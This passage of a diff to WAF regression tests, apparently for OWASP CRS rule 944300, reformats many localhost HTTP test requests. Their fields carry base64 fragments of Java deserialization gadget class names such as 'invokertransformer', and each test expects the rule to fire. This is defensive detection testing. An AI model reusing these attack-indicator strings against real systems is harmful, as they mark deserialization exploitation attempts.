- - test_title: 944300-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 210 desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-218 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 221 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 223 desc: 
"Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 226 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-227 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 232 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
